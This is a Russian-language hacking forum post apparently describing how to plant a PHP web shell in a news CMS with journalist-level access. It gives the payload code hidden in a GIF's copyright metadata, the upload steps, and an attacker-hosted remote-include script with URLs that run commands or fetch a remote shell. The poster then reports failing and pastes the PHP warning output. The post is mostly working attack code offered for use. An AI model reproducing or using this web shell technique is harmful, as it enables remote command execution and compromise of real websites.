02.04.2008, 11:43
|
|
Новичок
Регистрация: 16.11.2007
Сообщений: 22
Провел на форуме:
147197
Репутация:
5
|
|
нашел на секьюритилаб
Необходимый уровень доступа: => 3 (journalist)
# SHELL #
[1] Открываем фотошоп, создаем картинку 60х60. Идем в File -> File Info и пишем в поле копирайтов: Код <?php passthru($_GET['cmd']); include($_GET['sh']); ?> Сохраняем картинку с именем image.gif
[2] Постим новость. Вводим все необходимые поля и жмем на ссылку [insert image]. Жмем на кнопку Обзор и выбираем наш image.gif. Жмем на upload. Если все прошло успешно, видим сообщение: "image.jpg -> Image was uploaded". Жмем на ссылку [insert it]. Жмем Add News. Наш image.gif расположен здесь: http://host/[news]/data/upimages/image.gif
[3] Получаем шелл. Регистрируем домен на хостинге с поддержкой PHP и allow_url_fopen = on (у нас будет http://host.ru). создаем файл (допустим inc.php) со следующим содержанием:
PHP код:
<?php include($_GET['shell']); ?>
Теперь запускаем его так: http://host.ru/inc.php?shell=http://host/[news]/data/upimages/image.gif&cmd=ls -la
или так:
http://host.ru/inc.php?shell=http://host/[news]/data/upimages/image.gif&sh=http://shell Прошелся 100 раз по всем трем пунктам =) результата 0 =) хостер (в локалке сервак) выдает:
Warning: include() [function.include]: URL file-access is disabled in the server configuration in C:\appserv\htdocs\inc.php on line 1
Warning: include(http://ip(там где картинка)/cute/data/upimages/image.gif) [function.include]: failed to open stream: no suitable wrapper could be found in C:\appserv\htdocs\inc.php on line 1
Warning: include() [function.include]: Failed opening 'http://ip(там где картинка)/cute/data/upimages/image.gif' for inclusion (include_path='.;C:\appserv\php\pear\') in C:\appserv\htdocs\inc.php on line 1
З.Ы. в пхп.ини include = on fopen = on |
|
|